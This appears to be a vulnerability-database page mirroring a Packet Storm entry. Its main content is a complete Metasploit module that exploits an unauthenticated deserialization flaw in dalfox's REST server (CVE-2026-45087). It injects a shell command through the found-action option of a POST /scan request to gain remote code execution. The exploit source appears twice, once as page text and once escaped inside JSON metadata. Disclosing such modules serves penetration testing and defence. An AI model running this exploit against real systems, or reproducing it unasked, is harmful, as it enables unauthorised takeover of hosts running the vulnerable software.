📄 Dalfox Found-Action Deserialization Remote Code Execution_PACKETSTORM:224334

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

When dalfox versions less than or equal to 2.12.0 is started in REST API server mode dalfox server, the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options - including...

Visit Original Source

Basic Information

ID PACKETSTORM:224334

Published Jun 25, 2026 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Dalfox Found-Action Deserialization RCE',
'Description' => %q{
When dalfox version <= 2.12.0 is started in REST API server mode (dalfox server),
the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key.
Because model.Options - including FoundAction and FoundActionShell - is deserialized directly from attacker-supplied JSON in POST /scan,
and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them,
any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.
},
'Author' => [
'Emmanuel David', # Vulnerability discovery and PoC
'Takahiro Yokoyama' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2026-45087'],
['GHSA', 'v25v-m36w-jp4h'],
],
'Targets' => [
[
'Linux Command', {
'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd
}
],
],
'DefaultOptions' => {
'FETCH_DELETE' => true,
'SRVPORT' => 8081,
'RPORT' => 6664
},
'DefaultTarget' => 0,
'Payload' => {
'BadChars' => '"'
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'DisclosureDate' => '2026-05-07',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)

register_advanced_options([
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
])
end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'swagger/index.html')
})
return Exploit::CheckCode::Unknown('Could not detect the dalfox.') unless res&.code == 200

Exploit::CheckCode::Appears('Dalfox detected.')
end

def on_request_uri(cli, request)
send_response(cli, "<html><body>#{request.resource}</body></html>")
end

def primer
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'scan'),
'headers' => { 'Content-Type' => 'application/json' },
'data' => {
'url' => get_uri,
'options' => {
'found-action' => payload.encode,
'found-action-shell' => 'bash',
'use-headless' => false,
'worker' => 1,
'limit-result' => 1
}
}.to_json
})
fail_with(Failure::Unknown, 'Unexpected server reply.') unless res&.code == 200
end

def exploit
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
# When the server stops due to our timeout, this is raised
end

end

{
    "lastseen": "2026-06-25T17:39:56",
    "description": "When dalfox versions less than or equal to 2.12.0 is started in REST API server mode dalfox server, the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options - including...",
    "published": "2026-06-25T00:00:00",
    "modified": "2026-06-25T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Dalfox Found-Action Deserialization Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:224334",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-45087"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::Remote::HttpServer\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Dalfox Found-Action Deserialization RCE',\n            'Description' => %q{\n              When dalfox version <= 2.12.0 is started in REST API server mode (dalfox server),\n              the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key.\n              Because model.Options - including FoundAction and FoundActionShell - is deserialized directly from attacker-supplied JSON in POST /scan,\n              and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them,\n              any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.\n            },\n            'Author' => [\n              'Emmanuel David',   # Vulnerability discovery and PoC\n              'Takahiro Yokoyama' # Metasploit module\n            ],\n            'License' => MSF_LICENSE,\n            'References' => [\n              ['CVE', '2026-45087'],\n              ['GHSA', 'v25v-m36w-jp4h'],\n            ],\n            'Targets' => [\n              [\n                'Linux Command', {\n                  'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd\n                }\n              ],\n            ],\n            'DefaultOptions' => {\n              'FETCH_DELETE' => true,\n              'SRVPORT' => 8081,\n              'RPORT' => 6664\n            },\n            'DefaultTarget' => 0,\n            'Payload' => {\n              'BadChars' => '\"'\n            },\n            'Stance' => Msf::Exploit::Stance::Aggressive,\n            'DisclosureDate' => '2026-05-07',\n            'Notes' => {\n              'Stability' => [ CRASH_SAFE, ],\n              'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n              'Reliability' => [ REPEATABLE_SESSION, ]\n            }\n          )\n        )\n    \n        register_advanced_options([\n          OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])\n        ])\n      end\n    \n      def check\n        res = send_request_cgi({\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'swagger/index.html')\n        })\n        return Exploit::CheckCode::Unknown('Could not detect the dalfox.') unless res&.code == 200\n    \n        Exploit::CheckCode::Appears('Dalfox detected.')\n      end\n    \n      def on_request_uri(cli, request)\n        send_response(cli, \"<html><body>#{request.resource}</body></html>\")\n      end\n    \n      def primer\n        res = send_request_cgi({\n          'method' => 'POST',\n          'uri' => normalize_uri(target_uri.path, 'scan'),\n          'headers' => { 'Content-Type' => 'application/json' },\n          'data' => {\n            'url' => get_uri,\n            'options' => {\n              'found-action' => payload.encode,\n              'found-action-shell' => 'bash',\n              'use-headless' => false,\n              'worker' => 1,\n              'limit-result' => 1\n            }\n          }.to_json\n        })\n        fail_with(Failure::Unknown, 'Unexpected server reply.') unless res&.code == 200\n      end\n    \n      def exploit\n        Timeout.timeout(datastore['HTTPDELAY']) { super }\n      rescue Timeout::Error\n        # When the server stops due to our timeout, this is raised\n      end\n    \n    end",
    "sourceHref": "https://packetstorm.news/download/224334",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/224334/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply